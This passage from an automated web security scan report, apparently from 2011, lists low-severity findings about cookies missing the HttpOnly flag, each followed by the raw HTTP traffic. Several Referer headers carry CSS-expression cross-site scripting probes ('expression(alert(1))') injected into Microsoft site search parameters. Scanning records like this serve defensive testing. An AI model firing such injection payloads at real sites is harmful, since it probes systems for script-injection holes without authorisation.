?.!!!!#=1D5@!$#WA!!!!$=2Z2#!$$F#!!!!#=/bCH!$%'+!!!!$=/>v>!$%,!!!!!$=2Z2#!$%SB!!!!$=2Z2#!$'/Y!!!!#=09!!!$(!(!!!!-=38n'!$(!P!!!!*=38n'!$)gA!!!!#=09!!!$*a0!!!!$=2Z2#!$,0h!!!!$=2Z2#!$,jw!!!!#=2w#K!$-%:!!!!$=38n'!$0VL!!!!%=38n'!$0VM!!!!%=38n'!$1]+!!!!+=38n'!$1g/!!!!%=1D5F!$2j$!!!!$=2Z2#!$3IO!!!!*=38n'!$3y-!!!!(=2w%w!$4ou!!!!$=2Z2#!$5)A!!!!#=09!!!$5Rt!!!!#=1>Dd!$5Ru!!!!#=2w#K!$8+W!!!!%=38n'!$8>S!!!!%=1D5C!$8Js!!!!#=/(P2!$8Ju!!!!#=/(P2!$:3.!!!!#=2w#K!$<DI!!!!*=38n'!$=Gi!!!!#=0_Lo!$=p7!!!!#=2Z2#!$=p8!!!!#=2Z2#!$=s9!!!!#=3+WO!$>#M!!!!#=2Z2#!$>#N!!!!#=2Z2#!$>_#!!!!#=2Z2#!$?i5!!!!$=3BC@!$?tC!!!!#=38n'"; path=/; expires=Mon, 02-Sep-2013 14:43:58 GMT
Set-Cookie: BX=8d7n6ot73ufk2&b=4&s=8m&t=219; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Sat, 03 Sep 2011 14:43:58 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

11.9. http://am.trafficmp.com/a/bpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://am.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=41&id=23 HTTP/1.1
Host: am.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4fae74084-d4c4-4986-af20-d7ce71839597-gs1x0mwv; T_k5bs=ndp%3Ay5%3A1; rth=2-lqupie-ndp~y5~1~1-exv~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Sat, 03 Sep 2011 21:33:57 GMT
Connection: close
Set-Cookie: T_k5bs=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8t18=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3dqj=44%3A4528%3A1; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:33:58 GMT; Path=/
Set-Cookie: rth=2-lqupie-44~4528~1~1-ndp~y5~1~1-exv~0~1~1-; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:33:58 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

11.10. http://am.trafficmp.com/a/bpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://am.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=41&id=23 HTTP/1.1
Host: am.trafficmp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=SEO000000000W&dtmc_ref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&dtmc_loc=http%3A//www.register.com/
Cookie: rth=2-lpay4l-ltn~xc1g~1~1-3rj~jjg5~1~1-f5h~j7wq~1~1-45~bitw~1~1-6ju~a92r~1~1-eww~a872~1~1-3ri~2h5f~1~1-44~0~1~1-; uid2=499d34e38-cf7e-49f0-bcb0-ea11d282884d-gquw3zmv; T_i366=ltn%3Axc1f%3A1; T_50nu=ltn%3Axc1g%3A1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Sat, 03 Sep 2011 21:56:33 GMT
Connection: close
Set-Cookie: T_i366=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_50nu=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k5bs=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8t18=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3dqj=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_gbo2=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_hatf=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_a6ik=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7ays=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1icy=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_c1h2=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_5mlb=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bis5=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6ovq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_juxr=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_4f6f=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_j20p=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_97h5=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_9n5i=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_gqzz=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_l42m=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_apfx=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_56hy=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7ie7=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_kr8s=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_eeio=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1cyz=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8s6f=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_5t2t=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ao1w=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_jy9u=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_che1=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k0ro=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_j6gc=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_9qc3=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1jao=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_d2cl=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_35nq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_f15s=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_iva8=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8j53=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bh8s=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6ppb=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_gdl1=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6djq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_40xg=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ku6m=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_n5u=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_67pf=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6nf8=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8nzd=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_g4f5=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ej8q=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_f1vi=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_540v=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k6pv=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_jv4e=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_l30v=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k9ng=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ciyg=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_dw7i=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_fpdf=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_96ti=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_c72l=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_h110=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k9bd=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ja6q=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_cl47=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_axl=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_f8zj=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_afn4=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6q6i=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_49e=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_d73n=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_e4a9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bydu=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_h5ls=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_25br=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_aoaw=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_g4lf=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_798a=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_drva=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7f3p=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_5isr=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_9dth=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_dy0g=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_eylv=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_860a=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_37t9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6zdh=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6wqt=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bg5l=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3vjx=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_d2vl=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3rgy=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8oa1=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_e1hd=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_im3g=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_efdn=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7dx8=44%3A1nxhp%3A1; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:56:34 GMT; Path=/
Set-Cookie: rth=2-lpay4l-44~1nxhp~1~1-ltn~xc1g~1~1-3rj~jjg5~1~1-f5h~j7wq~1~1-45~bitw~1~1-6ju~a92r~1~1-eww~a872~1~1-3ri~2h5f~1~1-; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:56:34 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

11.11. http://api.flickr.com/clientaccesspolicy.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.flickr.com
Path:   /clientaccesspolicy.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clientaccesspolicy.xml HTTP/1.1
Host: api.flickr.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 03 Sep 2011 13:08:20 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sat, 31-Aug-2013 13:08:20 GMT; path=/; domain=.flickr.com
Cache-Control: private
X-Served-By: www169.flickr.mud.yahoo.com
Vary: Accept-Encoding
Content-Length: 2211
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Flickr API: Page not found</title>
   <link href="http://l.yimg.com/g/css/c_flickr.css.v106445.18" rel="styleshe
...[SNIP]...

11.12. http://api.twitter.com/1/statuses/user_timeline/msnewengland.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline/msnewengland.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline/msnewengland.json?callback=twitterCallback1&count=20&include_rts=true&cb=0.527256862920519 HTTP/1.1
Host: api.twitter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?%22?search=7049b%22style%3d%22x%20%3aexpression(alert(1))%20%22c711dde2c4%22
Cookie: guest_id=v1%3A131220472331773196; __utma=43838368.1381732871.1312402661.1312402661.1313158153.2; __utmz=43838368.1313158153.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmv=43838368.lang%3A%20en; k=50.23.123.106.1315057356690299

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 14:21:55 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315059715-88680-46684
X-RateLimit-Limit: 150
ETag: "d6715ce9f0c1e79626dc79a82e11136d"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 14:21:55 GMT
X-RateLimit-Remaining: 117
X-Runtime: 0.02658
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 33c5077e66a29112e5648db50c44d0bf3dfde71d
X-RateLimit-Reset: 1315062687
Set-Cookie: original_referer=OTZIBTkFw3vYp%2FBMUg4b7T4B5g%2BzzNBf74aOd5w5n3nDOQkgNed6OJLUuIobmU96yc8jAtFxZR9no3nLVaMrr1KJ4TGd50qN1EV9hxNzFVMFzbCHe5quZhHVbmpuwkjpV7ztueQSviIMnOQlXfWj0hLqdh2IsSWra2SKzXw17GNUsWwoiYAp2NEm8KSwMa38; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCNDMqi8yAToHaWQiJTEwNzljZDk3Y2JmMGI3%250AYzExYzgwZjI3MGExZGNkMjM3IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--af16b2ebca57d874237053c36043967ac7180535; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 72089
Connection: close

twitterCallback1([{"retweeted_status":{"id_str":"109776676589801472","in_reply_to_status_id":null,"truncated":false,"user":{"profile_sidebar_fill_color":"C0DFEC","protected":false,"id_str":"259784927"
...[SNIP]...

11.13. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035669&c3=&c4=http%3A%2F%2Fmeetupblog.meetup.com%2F&c5=&c6=&c15=&ns__t=1315055589073&ns_c=UTF-8&c8=The%20Official%20Meetup%20HQ%20Blog&c7=http%3A%2F%2Fmeetupblog.meetup.com%2F&c9=http%3A%2F%2Fwww.meetup.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://meetupblog.meetup.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sat, 03 Sep 2011 13:12:30 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 02-Sep-2013 13:12:30 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


11.14. http://b.scorecardresearch.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=3000001&d.c=gif&d.o=msnportalbetarmc&d.x=76374269&d.t=page&d.u=http%3A%2F%2Fresearch.microsoft.com%2Fapps%2Fdp%2Fsearch.aspx%3Fq%3D27b6a%2522style%25253d%2522x%2B%25253aexpression%2528alert%25281%2529%2529%2B%2522d048afd9275%26x%3D0%26y%3D0%23p%3D1%26ps%3D36%26so%3D1%26sb%3Dd%26fr%3D%26to%3D%26fd%3D%26td%3D%26rt%3D%26f%3D%26a%3D%26pn%3D27b6a%2522style%25253d%2522x%2B%25253aexpression%2528alert%25281%2529%2529%2B%2522d048afd9275%26pa&d.r=http%3A%2F%2Fresearch.microsoft.com%2Fen-us%2Fdefault.aspx HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/apps/dp/search.aspx?q=27b6a%22style%253d%22x+%253aexpression%28alert%281%29%29+%22d048afd9275&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sat, 03 Sep 2011 12:56:28 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 02-Sep-2013 12:56:28 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

11.15. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=replace&advid=749&token=DOTM5 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app602
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Tue, 28-Aug-2012 21:33:49 GMT; Path=/
Set-Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A749%3B09%2F17%2F2011%3BDOTM5; Domain=.contextweb.com; Expires=Sun, 07-Aug-2016 21:33:49 GMT; Path=/
Content-Type: image/gif
Date: Sat, 03 Sep 2011 21:33:49 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

11.16. http://c7.zedo.com/img/bh.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=305&g=20&a=149&s=1&t=r HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
